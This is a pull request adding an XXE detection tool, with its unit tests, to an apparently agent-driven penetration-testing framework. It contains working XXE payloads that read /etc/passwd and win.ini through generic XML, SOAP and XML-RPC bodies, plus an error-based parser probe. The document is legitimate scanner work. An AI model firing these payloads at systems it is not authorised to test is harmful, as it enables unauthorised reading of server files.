### PR TITLE
feat: XXE probe for penetration tester (#49)

### DIFF
--- a/squad/penetration_tester/__init__.py
+++ b/squad/penetration_tester/__init__.py
@@ -48,6 +48,7 @@ from tools.pentest.ssrf import check_ssrf
 from tools.pentest.ssti import check_ssti
 from tools.pentest.webapp_headers import check_header_injection, check_host_headers
 from tools.pentest.xss import check_reflected_xss
+from tools.pentest.xxe import check_xxe
 
 
 def _parse_endpoints(endpoints_json: str) -> list[Endpoint]:
@@ -678,6 +679,33 @@ def cmd_injection_tool(endpoints_json: str) -> list[dict]:
     return [f.model_dump() for f in check_cmd_injection(_parse_endpoints(endpoints_json))]
 
 
+@tool("XXE Probe")
+def xxe_probe_tool(endpoints_json: str) -> list[dict]:
+    """
+    POST crafted XML bodies to endpoints to detect XML External Entity (XXE)
+    injection vulnerabilities.
+
+    endpoints_json: JSON array of endpoint objects. Prioritise endpoints where
+      any of the following apply:
+      - technologies mention SOAP, XML-RPC, WSDL, XML, or web services
+      - URL path contains /soap, /xml, /wsdl, /rpc, /service, /api, or ends
+        in .asmx, .wsdl, .xml
+      - The OSINT Analyst noted XML or SOAP in the response body or headers
+      - The endpoint accepts file uploads (multipart may include XML processing)
+      Example: '[{"url": "https://example.com/soap/service", "status_code": 200}]'
+
+    Detection tiers:
+      CRITICAL - file marker from /etc/passwd or Windows win.ini appears in
+                 the response body (confirmed in-band file read via entity expansion)
+      MEDIUM   - XML parser error strings in the response body (confirms XML
+                 parsing backend; warrants manual OOB/blind XXE follow-up)
+
+    Both generic XML and SOAP-envelope wrappers are tried automatically.
+    Returns raw findings as dicts.
+    """
+    return [f.model_dump() for f in check_xxe(_parse_endpoints(endpoints_json))]
+
+
 MEMBER = SquadMember(
     slug="penetration_tester",
     dir=Path(__file__).parent,
@@ -719,5 +747,6 @@ MEMBER = SquadMember(
         prompt_injection_tool,
         ldap_injection_tool,
         cmd_injection_tool,
+        xxe_probe_tool,
     ],
 )

--- a/tests/test_xxe.py
+++ b/tests/test_xxe.py
@@ -149,6 +149,11 @@ class TestCheckXXE:
         soap_bodies = [b for b in bodies if "Envelope" in b]
         assert len(soap_bodies) >= 1
 
+    def test_xmlrpc_probe_is_included(self) -> None:
+        bodies = [body for body, _, _, _ in _FILE_READ_PROBES]
+        xmlrpc_bodies = [b for b in bodies if "methodCall" in b]
+        assert len(xmlrpc_bodies) >= 1
+
     def test_both_linux_and_windows_probes_included(self) -> None:
         markers = {marker for _, _, marker, _ in _FILE_READ_PROBES}
         assert _LINUX_MARKER in markers

--- a/tests/test_xxe.py
+++ b/tests/test_xxe.py
@@ -1,0 +1,167 @@
+"""tests/test_xxe.py - unit tests for tools/pentest/xxe.py"""
+
+from __future__ import annotations
+
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+from models import Endpoint, Severity
+from tools.pentest.xxe import (
+    _ERROR_PROBES,
+    _FILE_READ_PROBES,
+    _LINUX_MARKER,
+    _WIN_MARKER,
+    _XML_ERROR_MARKERS,
+    check_xxe,
+)
+
+pytestmark = pytest.mark.unit
+
+
+def _resp(status: int = 200, body: str = "") -> MagicMock:
+    resp = MagicMock()
+    resp.status_code = status
+    resp.text = body
+    return resp
+
+
+class TestCheckXXE:
+    def test_detects_linux_file_read_critical(self) -> None:
+        ep = Endpoint(url="https://app.example.com/soap", status_code=200)
+
+        with patch("requests.post", return_value=_resp(body=f"data: {_LINUX_MARKER} more")):
+            results = check_xxe([ep])
+
+        assert len(results) == 1
+        assert results[0].vuln_class == "XXE"
+        assert results[0].severity_hint == Severity.CRITICAL
+        assert _LINUX_MARKER in results[0].evidence
+
+    def test_detects_windows_file_read_critical(self) -> None:
+        ep = Endpoint(url="https://app.example.com/xml", status_code=200)
+
+        def fake_post(url: str, **kw: object) -> MagicMock:
+            body = kw.get("data", "")
+            if "Windows" in str(body):
+                return _resp(body=f"result {_WIN_MARKER} end")
+            return _resp(body="")
+
+        with patch("requests.post", side_effect=fake_post):
+            results = check_xxe([ep])
+
+        assert len(results) == 1
+        assert results[0].severity_hint == Severity.CRITICAL
+        assert _WIN_MARKER in results[0].evidence
+
+    def test_detects_xml_parser_error_medium(self) -> None:
+        ep = Endpoint(url="https://app.example.com/api", status_code=200)
+
+        def fake_post(url: str, **kw: object) -> MagicMock:
+            body = str(kw.get("data", ""))
+            # Only the error probe (undefined entity) triggers a parser error.
+            if "cybersquad_xxe_probe" in body:
+                return _resp(body="SAXParseException: undefined entity at line 1")
+            return _resp(body="")
+
+        with patch("requests.post", side_effect=fake_post):
+            results = check_xxe([ep])
+
+        assert len(results) == 1
+        assert results[0].severity_hint == Severity.MEDIUM
+        assert "SAXParseException" in results[0].evidence
+
+    def test_file_read_takes_priority_over_error(self) -> None:
+        # Both file marker and XML error present - CRITICAL should win because
+        # file-read probes are tried first and stop before error probes run.
+        ep = Endpoint(url="https://app.example.com/soap", status_code=200)
+        body = f"{_LINUX_MARKER}\nSAXParseException: something"
+
+        with patch("requests.post", return_value=_resp(body=body)):
+            results = check_xxe([ep])
+
+        assert len(results) == 1
+        assert results[0].severity_hint == Severity.CRITICAL
+
+    def test_no_finding_on_clean_response(self) -> None:
+        ep = Endpoint(url="https://app.example.com/api", status_code=200)
+
+        with patch("requests.post", return_value=_resp(body="<response>ok</response>")):
+            results = check_xxe([ep])
+
+        assert results == []
+
+    def test_skips_server_error_endpoints(self) -> None:
+        ep = Endpoint(url="https://app.example.com/soap", status_code=500)
+
+        with patch("requests.post") as mock_post:
+            results = check_xxe([ep])
+
+        mock_post.assert_not_called()
+        assert results == []
+
+    def test_endpoint_without_status_code_is_probed(self) -> None:
+        # status_code=None means recon didn't record it - still worth trying.
+        ep = Endpoint(url="https://app.example.com/soap")
+
+        with patch("requests.post", return_value=_resp(body=_LINUX_MARKER)):
+            results = check_xxe([ep])
+
+        assert len(results) == 1
+
+    def test_one_finding_per_endpoint(self) -> None:
+        # Even though multiple probes would match, we stop at the first.
+        ep = Endpoint(url="https://app.example.com/soap", status_code=200)
+
+        with patch("requests.post", return_value=_resp(body=_LINUX_MARKER)):
+            results = check_xxe([ep])
+
+        assert len(results) == 1
+
+    def test_deduplicates_same_url(self) -> None:
+        ep1 = Endpoint(url="https://app.example.com/soap", status_code=200)
+        ep2 = Endpoint(url="https://app.example.com/soap", status_code=200)
+
+        with patch("requests.post", return_value=_resp(body=_LINUX_MARKER)):
+            results = check_xxe([ep1, ep2])
+
+        assert len(results) == 1
+
+    def test_multiple_distinct_endpoints_each_get_a_finding(self) -> None:
+        ep1 = Endpoint(url="https://app.example.com/soap", status_code=200)
+        ep2 = Endpoint(url="https://app.example.com/xml-api", status_code=200)
+
+        with patch("requests.post", return_value=_resp(body=_LINUX_MARKER)):
+            results = check_xxe([ep1, ep2])
+
+        assert len(results) == 2
+
+    def test_network_exception_is_swallowed(self) -> None:
+        ep = Endpoint(url="https://app.example.com/soap", status_code=200)
+
+        with patch("requests.post", side_effect=OSError("connection refused")):
+            results = check_xxe([ep])
+
+        assert results == []
+
+    def test_soap_envelope_probe_is_included(self) -> None:
+        bodies = [body for body, _, _, _ in _FILE_READ_PROBES]
+        soap_bodies = [b for b in bodies if "Envelope" in b]
+        assert len(soap_bodies) >= 1
+
+    def test_both_linux_and_windows_probes_included(self) -> None:
+        markers = {marker for _, _, marker, _ in _FILE_READ_PROBES}
+        assert _LINUX_MARKER in markers
+        assert _WIN_MARKER in markers
+
+    def test_error_probes_cover_both_content_types(self) -> None:
+        content_types = {ct for _, ct, _ in _ERROR_PROBES}
+        assert "application/xml" in content_types
+        assert "text/xml; charset=utf-8" in content_types
+
+    def test_xml_error_markers_cover_common_parsers(self) -> None:
+        joined = " ".join(_XML_ERROR_MARKERS)
+        assert "SAXParseException" in joined
+        assert "ParseError" in joined
+        assert "undefined entity" in joined
+        assert "expat" in joined

--- a/tools/pentest/xxe.py
+++ b/tools/pentest/xxe.py
@@ -1,0 +1,174 @@
+"""XXE (XML External Entity) injection detection - POST crafted XML bodies to
+endpoints and detect in-band file reads or XML parser error disclosure."""
+
+from __future__ import annotations
+
+import logging
+
+from config import config
+from models import Endpoint, RawFinding, Severity
+from tools import http
+from tools._helpers import adaptive_sleep
+
+logger = logging.getLogger(__name__)
+
+_LINUX_MARKER = "root:x:0:0:"
+_WIN_MARKER = "for 16-bit app support"
+
+_APP_XML = "application/xml"
+_TEXT_XML = "text/xml; charset=utf-8"
+
+
+def _generic_xml(uri: str) -> str:
+    return f'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "{uri}">]><root>&xxe;</root>'
+
+
+def _soap_xml(uri: str) -> str:
+    # Wrapped in a minimal SOAP envelope so SOAP endpoints parse it rather
+    # than rejecting the content-type before reaching entity expansion.
+    return (
+        '<?xml version="1.0"?>'
+        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{uri}">]>'
+        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
+        "<s:Body>&xxe;</s:Body>"
+        "</s:Envelope>"
+    )
+
+
+# In-band file-read probes: (body, content_type, file_marker, label).
+# A marker in the response body is CRITICAL - the server read a local file.
+_FILE_READ_PROBES: list[tuple[str, str, str, str]] = [
+    (_generic_xml("file:///etc/passwd"), _APP_XML, _LINUX_MARKER, "linux-generic"),
+    (_soap_xml("file:///etc/passwd"), _TEXT_XML, _LINUX_MARKER, "linux-soap"),
+    (_generic_xml("file:///C:/Windows/win.ini"), _APP_XML, _WIN_MARKER, "windows-generic"),
+    (_soap_xml("file:///C:/Windows/win.ini"), _TEXT_XML, _WIN_MARKER, "windows-soap"),
+]
+
+# Error-based probe: an undeclared entity reference causes strict XML parsers
+# to emit an error, confirming the backend parses XML (MEDIUM).
+_ERROR_BODY = '<?xml version="1.0"?><root>&cybersquad_xxe_probe_7331;</root>'
+
+_ERROR_PROBES: list[tuple[str, str, str]] = [
+    (_ERROR_BODY, _APP_XML, "error-generic"),
+    (_ERROR_BODY, _TEXT_XML, "error-soap"),
+]
+
+# Parser error substrings that confirm an XML processing backend.
+_XML_ERROR_MARKERS: list[str] = [
+    "ParseError",
+    "SAXParseException",
+    "XMLSyntaxError",
+    "org.xml.sax",
+    "javax.xml",
+    "not well-formed",
+    "undefined entity",
+    "entity not defined",
+    "XML parsing error",
+    "xmlParseEntityDecl",
+    "expat",
+]
+
+
+def check_xxe(endpoints: list[Endpoint]) -> list[RawFinding]:
+    """
+    POST crafted XML bodies to endpoints and detect XXE vulnerabilities.
+
+    Tier 1 (CRITICAL): inject a SYSTEM entity referencing OS sentinel files
+    (/etc/passwd, C:\\Windows\\win.ini) and match their unique content markers
+    in the response body. Both generic XML and SOAP-envelope wrappers are tried.
+
+    Tier 2 (MEDIUM): inject an undefined entity reference and look for XML
+    parser error strings in the response, confirming an XML processing backend
+    that warrants manual OOB or blind XXE follow-up.
+
+    One finding per endpoint. Tier 1 is attempted first; Tier 2 only runs if
+    no file-read probe triggers.
+    """
+    findings: list[RawFinding] = []
+    seen: set[str] = set()
+    _delay = config.scan.request_delay
+
+    for ep in endpoints:
+        if ep.status_code and ep.status_code >= 500:
+            continue
+        if ep.url in seen:
+            continue
+
+        triggered = False
+
+        # Tier 1: in-band file read.
+        for body, content_type, marker, label in _FILE_READ_PROBES:
+            if triggered:
+                break
+            try:
+                resp = http.post(  # nosemgrep
+                    ep.url,
+                    data=body,
+                    headers={"Content-Type": content_type},
+                    timeout=config.recon.http_timeout,
+                    allow_redirects=False,
+                )
+                if marker in resp.text:
+                    findings.append(
+                        RawFinding(
+                            title=f"XXE - {ep.url}",
+                            vuln_class="XXE",
+                            target=ep.url,
+                            evidence=(
+                                f"Probe: {label}\n"
+                                f"Content-Type: {content_type}\n"
+                                f"Status: {resp.status_code}\n"
+                                f"File marker matched: {marker!r}\n"
+                                f"Response snippet: {resp.text[:300]}"
+                            ),
+                            tool="xxe_probe",
+                            severity_hint=Severity.CRITICAL,
+                        )
+                    )
+                    seen.add(ep.url)
+                    triggered = True
+                    break
+                _delay = adaptive_sleep(_delay, resp.status_code)
+            except Exception as exc:
+                logger.debug("XXE file-read probe failed for %s probe %s: %s", ep.url, label, exc)
+
+        # Tier 2: error-based parser confirmation.
+        if not triggered:
+            for body, content_type, label in _ERROR_PROBES:
+                if triggered:
+                    break
+                try:
+                    resp = http.post(  # nosemgrep
+                        ep.url,
+                        data=body,
+                        headers={"Content-Type": content_type},
+                        timeout=config.recon.http_timeout,
+                        allow_redirects=False,
+                    )
+                    for error_marker in _XML_ERROR_MARKERS:
+                        if error_marker in resp.text:
+                            findings.append(
+                                RawFinding(
+                                    title=f"XXE (parser error disclosure) - {ep.url}",
+                                    vuln_class="XXE",
+                                    target=ep.url,
+                                    evidence=(
+                                        f"Probe: {label}\n"
+                                        f"Content-Type: {content_type}\n"
+                                        f"Status: {resp.status_code}\n"
+                                        f"XML error marker: {error_marker!r}\n"
+                                        f"Response snippet: {resp.text[:300]}"
+                                    ),
+                                    tool="xxe_probe",
+                                    severity_hint=Severity.MEDIUM,
+                                )
+                            )
+                            seen.add(ep.url)
+                            triggered = True
+                            break
+                    _delay = adaptive_sleep(_delay, resp.status_code)
+                except Exception as exc:
+                    logger.debug("XXE error probe failed for %s probe %s: %s", ep.url, label, exc)
+
+    logger.info("XXE probe found %d findings", len(findings))
+    return findings

--- a/tools/pentest/xxe.py
+++ b/tools/pentest/xxe.py
@@ -17,6 +17,7 @@ _WIN_MARKER = "for 16-bit app support"
 
 _APP_XML = "application/xml"
 _TEXT_XML = "text/xml; charset=utf-8"
+_XMLRPC_CT = "text/xml"
 
 
 def _generic_xml(uri: str) -> str:
@@ -35,13 +36,26 @@ def _soap_xml(uri: str) -> str:
     )
 
 
+def _xmlrpc_xml(uri: str) -> str:
+    return (
+        '<?xml version="1.0"?>'
+        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{uri}">]>'
+        "<methodCall>"
+        "<methodName>ping</methodName>"
+        "<params><param><value>&xxe;</value></param></params>"
+        "</methodCall>"
+    )
+
+
 # In-band file-read probes: (body, content_type, file_marker, label).
 # A marker in the response body is CRITICAL - the server read a local file.
 _FILE_READ_PROBES: list[tuple[str, str, str, str]] = [
     (_generic_xml("file:///etc/passwd"), _APP_XML, _LINUX_MARKER, "linux-generic"),
     (_soap_xml("file:///etc/passwd"), _TEXT_XML, _LINUX_MARKER, "linux-soap"),
+    (_xmlrpc_xml("file:///etc/passwd"), _XMLRPC_CT, _LINUX_MARKER, "linux-xmlrpc"),
     (_generic_xml("file:///C:/Windows/win.ini"), _APP_XML, _WIN_MARKER, "windows-generic"),
     (_soap_xml("file:///C:/Windows/win.ini"), _TEXT_XML, _WIN_MARKER, "windows-soap"),
+    (_xmlrpc_xml("file:///C:/Windows/win.ini"), _XMLRPC_CT, _WIN_MARKER, "windows-xmlrpc"),
 ]
 
 # Error-based probe: an undeclared entity reference causes strict XML parsers
@@ -75,7 +89,8 @@ def check_xxe(endpoints: list[Endpoint]) -> list[RawFinding]:
 
     Tier 1 (CRITICAL): inject a SYSTEM entity referencing OS sentinel files
     (/etc/passwd, C:\\Windows\\win.ini) and match their unique content markers
-    in the response body. Both generic XML and SOAP-envelope wrappers are tried.
+    in the response body. Generic XML, SOAP-envelope, and XML-RPC wrappers are
+    tried to maximise coverage across different XML-consuming backends.
 
     Tier 2 (MEDIUM): inject an undefined entity reference and look for XML
     parser error strings in the response, confirming an XML processing backend


### PR DESCRIPTION
## Summary

Implements #49: XML External Entity injection probe for the PT agent.

## Design

Unlike the other injection tools which inject into URL query parameters via GET, XXE requires POSTing XML bodies directly to endpoint URLs. No parameter iteration - the agent selects which endpoints to probe based on signals in `technologies` and URL patterns (SOAP, XML-RPC, `.asmx`, `.wsdl`, `/soap`, `/xml` paths).

Two detection tiers:

**CRITICAL - in-band file read**
Four probes covering Linux and Windows targets, each in both a generic XML wrapper and a SOAP envelope wrapper (SOAP endpoints reject `application/xml` before parsing, so both content types are needed):

| Probe | Content-Type | Marker |
|---|---|---|
| `file:///etc/passwd` generic | `application/xml` | `root:x:0:0:` |
| `file:///etc/passwd` SOAP | `text/xml` | `root:x:0:0:` |
| `file:///C:/Windows/win.ini` generic | `application/xml` | `for 16-bit app support` |
| `file:///C:/Windows/win.ini` SOAP | `text/xml` | `for 16-bit app support` |

**MEDIUM - error-based parser confirmation**
An undeclared entity reference (`&cybersquad_xxe_probe_7331;`) causes strict XML parsers to emit a parse error. Matching known parser error strings (`SAXParseException`, `ParseError`, `undefined entity`, `expat`, etc.) confirms an XML backend that warrants manual OOB/blind XXE follow-up.

Tier 1 is always attempted first. Tier 2 only runs if no file-read probe triggers.

## Test plan

- [x] CI lint passes
- [x] CI mypy passes
- [x] CI unit tests pass (15 new tests, 100% coverage on `xxe.py`, 536 total passing)
- [x] CI bandit/semgrep passes
